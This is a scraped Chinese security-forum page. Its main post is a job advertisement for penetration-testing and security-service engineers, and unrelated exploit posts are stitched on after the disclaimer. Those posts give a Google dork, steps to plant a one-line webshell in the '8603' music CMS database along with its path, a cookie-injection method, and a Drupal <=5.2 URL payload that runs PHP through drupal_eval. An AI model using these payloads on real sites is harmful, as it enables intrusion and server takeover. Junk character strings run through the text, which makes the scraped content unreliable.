最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 浙江政安信息安全研究中心招贤纳士啦!

  • 招聘职位: 其他职位
  • 公司名称: 浙江政安信息安全研究中心
  • 工作地点: 浙江
  • 专业要求: 计算机专业 
  • 学历要求: 大专
  • 工作经验: 1年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.sitedirsec.com
  • 简历邮箱: 352113371@qq.com
  • 联系电话: 13000000000
  • 在线QQ: 352113371
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++浙江政安信息安全研究中心相关说明++++++++++

    浙江政安信息安全研究中心招贤纳士啦!
    ; B! K# ?: Y$ p: Q, z简历投递:352113371@qq.com
    2 L: @; I+ x  O2 Y9 _/ J9 m
    4 \0 f4 S5 W3 y* P# Z' H+ f职位:售前工程师 2名 【7000-15000】- F+ i8 ~6 E' `6 K: U
    岗位职责:
    9 K/ c: X* _' Q  \6 `1、配合销售人员参与信息安全咨询服务及安全服务项目(包括渗透测试、漏洞扫描、APP安全测试、应急响应、安全加固、风险评估、安全规划、安全管理咨询等)的售前工作;: Z; i* q0 ]' ~7 x9 r
    2、配合销售人员准备与用户的技术交流、PPT等技术文件;
    ' f: b& m  m  A3、负责信息安全咨询服务及安全服务的实施工作;
    + b% X1 s- {+ F. [- b! ^( Q' \7 ]4、负责信息安全解决方案的售前,对信息安全解决方案项目进行售前技术支持,并协助销售人员跟进项目进度,配合项目的招投标工作(特别是技术方案的编写);! `( ]8 Y" o; q0 J, k7 d+ k
    5、负责信息安全咨询项目的现场调研、资料搜集、课题研究及用户答疑等工作;2 t4 Z6 Q2 k( v+ R: ~( k
    任职要求:( K, @# ?9 L; d! r7 u
    1、信息安全及计算机相关专业毕业,正规院校大学本科及以上学历。至少2年以上工作经验、有非常好的语言、文字组织能力;
    ( W* J8 g+ B' p4 b2、有较广泛的IT基础知识,熟悉主流应用系统架构,对网络架构、加密认证类设备、网络安全产品深入了解;
    ; J! e; D* e! b5 _3、熟悉企业IT规划的方法论和过程;
    6 q8 q3 \+ w) M( J7 P6 y' p4、为客户提供过信息安全项目策划,具有丰富的信息安全项目策划和实施经验;
    8 F/ j3 R+ _9 ^( @  ^+ Y5 ]6 q5、熟练掌握ISO27001等国际国内信息安全管理体系有关标准,掌握或从事过风险评估工作;
    ! f, L7 g. P: U3 i/ I* N6、具有良好的客户沟通能力及技巧;
    $ H# F, o9 j+ I+ Q) B2 w7、能适应经常性短期出差;5 u4 K7 o5 @# b
    8、具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;
    ; o  m; Z9 V/ R$ y$ |/ J# Q6 K( z5 ~9 ]7 h. t
    职位:高级信息与网络安全工程师 3名 【5000-25000】
    / [' c, ~+ t' x1 b) s% c1 s* n; e岗位职责:
    * ?0 t8 P* y! a" s7 W    常驻政府单位或国有企业用户现场,根据用户需求提供现场信息与网络安全相关的支持服务,具体内容包括日常安全设备巡检、安全风险事件处理和应急响应、应用系统漏洞扫描和渗透测试、系统安全加固等工作。相关事件要求能形成规范的书面文字材料进行汇报。! D) v5 @! x, Z! [
    任职条件:7 t# a/ w& o2 {, K3 z4 `. @6 ?2 a
    1、1-5年以上信息与网络安全相关工作经验。具有CCIE/CISP/CISSP等安全相关证书者优先;具有政府单位、大型企业单位驻场服务经历的优先;最终视工作年限和工作经验确定薪酬。5 z3 X9 J3 s' E; O1 d
    2、熟悉路由器、交换机、防火墙、入侵检测等常见网络安全产品;熟悉windows、linux等操作系统;熟悉常见数据库如Oracle、Sql server、My sql等;
    + P& {' P6 R! s* }3、对信息安全有兴趣和爱好,具有较强的学习能力。如无CISP证书的要求在入职以后3个月内取得证书。有渗透测试和应用开发经历与经验者优先;
    $ E$ l" Y0 E" [3 c4 Y# v& u0 x8 A- G0 k  _: c4、有高度的责任心,能适应工作压力;具有较强的沟通协调能力,良好的口头表达和技术文档撰写能力。面试时要求提供3份以上本人撰写的安全相关技术文档和报告材料。% E0 q. X7 c; ~+ R' N- n
    8 v7 I0 Z2 V- {1 v
    职位: 安全服务工程师 3名 【5000-15000】6 W" U! v9 _' W* c/ {1 @
    任职要求:
    * F+ q1 ]4 S! f4 x8 ^( `5 r1. 能力突出者专业学历不限;
    7 \7 w- j% G1 }; ]& U% `' M2. 对网络安全攻防有浓厚的兴趣并愿意为之倾注大量精力,有较强的工作责任心和主动学习能力;4 H" v* T- @6 o
    3. 熟练使用PHP、Python、Perl等任意一门编程语言;0 {1 X& t; D4 f0 W. u
    4. 掌握MSSQL、MySQL、Oracle、SQLite等一种或几种主流数据库结构以及语法;
    : g  w  `8 P  u: @, C5. 熟练使用各种安全扫描,渗透工具,有丰富的安全渗透经验并能能独立完成渗透测试;; C  O- @6 }. y, u
    6. 熟悉常见Web漏洞产生的原理,熟悉Windows、Linux平台渗透测试、权限提升、后门分析、安全加固等。
      k$ \: l" ^: F& ?  Q# _3 ]2 c3 R3 x% R优先考虑:3 l9 n, N% Y1 Q; ?: R! ~
    1.有能够进行项目管理、售前工作者,对具体技术能力可以适当降低) E- ]; I3 @( h. B1 M' U
    2.熟悉iOS & Android APP 等移动安全测试) c1 k- j; ~8 y# u9 G0 N! L
    3.对智能设备、硬件安全测试有了解,熟悉相关常见协议
    " B  ?% @# u; H, {% U2 f4.有代码审计相关经验者,具备逆向分析能力更佳;
    # s; n& x' C# W+ O0 ~9 I% |. ~5. 在漏乌云、洞盒子、补天等漏洞平台提交过相关有效漏洞;" s/ G2 a8 J6 X7 S* t0 T
    6.具有其它可以秒杀面试官能力
    * V$ r* F  x: C9 |" [3 A7.具有CISSP、CISA、CISP、ISO27001LA、ITIL等相关资质者优先;

     

    您可能还想看的主题:

    安全宝招聘安全服务工程师

    关于信息安全等级保护

    600万用户遭泄密案告破 CSDN首吃信息安全罚单

    Windows 优化大师 Pro v7.99 木蚂蚁社区绿色专版

    合优网站管理系统存在SQL注射。。。原创首发~

    启明星辰招聘

    [HR]北京安码科技 信息安全工程师

    [HR]上海四域 信息安全工程师

    《信息安全架构》

    继续信息安全。

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:無情发表,本帖发表者無情符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者無情和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    8603音乐网管理系统v2009.1001漏洞
    8603音乐网管理系统 v2009.1001 数据库可插入一句话和Cookies注入

    8 q1 L& p8 D8 H$ g$ L' {$ r
    数据库未作任何处理,可以插入一句话。继续插入经典一句话
    9 s, K* q9 M1 h$ f4 j1 z4 t6 x) q3 g
    9 T2 F! G% o; Z
    Google: inurl:player.asp?classid 打开网页,点击 请你添加歌曲,在歌曲地址处插入一句话,提交,连接数据库即可。数据库地址:/data/%23datalink.asa
    9 e: {: y) y3 U% A
    二,classid处可以Cookies注入classid=request("classid")set rs1=server.createobject("adodb.recordset")rs1.open "select * from feilei where classid="&classid,conn,1,3classid=rs1("classid")
    / k- h: h7 l2 {' C( A0 R1 }
    这里多啰嗦几句。关于Cookies注入的问题。有人问寡人那几句代码为什么存在Cookies注入。这个其实寡人在 微尔网站管理系统V1.51的cookies注入 的文章里说过了。这里在啰嗦几下。如有错误,请不吝指正。

    . k3 n! k: Q; ~% m# I# z3 Q
    变量都可以用request来直接取得的,并且是有先后顺序的,譬如你用这样的语句request("id")取得id变量,asp会先从Form过来的数据找变量,然后是QueryString部分,然后是Cookie部分。但是如果你指定了request.cookies("id")就只会从cookie里找变量内容,没有的话就为空,同理,如果用的是request.form("id")就会只从表单里取变量而不会理会其他提交方式中的内容。这三个取得变量的地方也是是我们经常提交数据的地方,并且都是很容易就能修改的,而player.asp他写的是直接request("classid"),并没有指明是那种方式,即使加了防注入,我们也可以突破防注入,用cookies注入,修补办法就是加上request的方法,把request("classid")改为request.queryString("classid"),
    5 }2 w+ r8 g# H- a7 H, j* w
    看看防注入页面,防注入页面只对 '----- 对 get query 值 的过滤.和 '-----对 post 表 单值的过滤.

    & c- s- X8 D6 K
    也就是过滤了request.QueryString和request.form的方法,而并没有过滤request.cookies的方法,cookies注

    2 J# _( z3 h. Y3 n* C
    入也就产生了
    3 o3 e) ^5 Z, }' [: H/ I
    用注入中转。

    0 e/ W  Z- {6 W* Y3 U8 I; p8 x4 |0 E4 \. h3 G& y( h6 B3 t

    " J) q( b+ n* J" N' `2 e- {; Z( V1 D. D7 J

    $ t% n' L' T6 G3 Y+ b' \$ o, s& t3 G7 ]5 q; h
    + T8 s# W/ r7 H5 ]

    2 P) ?( x2 n1 Y* z+ {5 V2 B  Y1 Z( \2 t8 m) S

    % y$ X- U& x( j
    8 O# F. {6 @9 k! p9 w- w' U& h/ g4 L
    ) ^( X/ Y  ~5 I
    , R8 T- P4 y0 v% ^: q
    $ a  R- F% c0 O* a$ M$ M& h) r9 S. |3 ~: M: I9 y6 H

    ( w) P6 ~% n% Y: D5 {
      w3 X. N4 X0 V2 D. C
    ' r0 f- ]% Z4 r4 a: r( l
    / t. z- c. M$ g5 O: j0 \4 X公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    发贴看看自己积分,呵呵,好像没有楼猪的多。& g, x" ~1 q* u4 v7 g( ]- M8 W
    0 y; j9 A1 M) l- w7 h

    0 Y  I: T& k" B5 |% n, v# p- C) G
    % ~& |  `' ~2 m: \3 @( Y/ w6 E
    1 I6 R+ u. s* w8 u$ G/ V" E" D& ~, H! `6 j9 @, {" I" K) r

    9 o' H$ a. T& Y1 w  R8 Y
    0 q0 K) o+ L$ I: S- K- j7 [* }0 n5 R; M; H

    6 ~4 t: @/ Z" I$ @. e* e; b$ g9 F& M0 r" H; c; G- ^

    3 G3 H' s. X3 C* {* n1 u8 }+ Y$ k; _6 ]! D

    ) q* ~7 a; b. q% g# r% o1 o" \  T
    & K, V6 s! _4 {9 G! _0 y* ]
    6 Y1 Q4 ~* D3 n8 K" m4 n4 n7 o
    ( b& G9 [) k+ p! ^: w

    : V0 E2 b: p0 P公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    php的zend哈希漏洞利用问题
    Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation VectorExample: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&amp;_menu[items][][type]=-1&amp;-312030023=1&amp;q=1/<?phpinfo();) J" X9 O6 P2 i. Z

    - P2 t) a1 N2 G
    / c9 T+ x$ n9 i
    # r9 y  ]! S  b  y% w1 \9 u# x3 ?% k% |& ]3 c

    5 D# W( t: V! W: H* u, a% U  g2 C/ ]( [

    ) r, [0 M) i8 u, }1 y3 a% i7 H, k3 D6 o4 ?7 q: v/ p
    8 K' b' Q3 [& L3 a$ R& i
      _: Q2 U/ R. S& Q

    4 R1 _6 f: v$ H; E5 l( ?* l' d2 j/ V* n0 T
    * |6 C5 H' H  i1 V

    " y8 Q+ u' w2 i, C
    8 Y' H" |6 c7 b5 m- z
    9 U0 K' `2 m# x) X$ |' b$ s$ D' q* S( R2 l* |" _3 o2 V  K
    6 |& F% N' B% s/ a
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表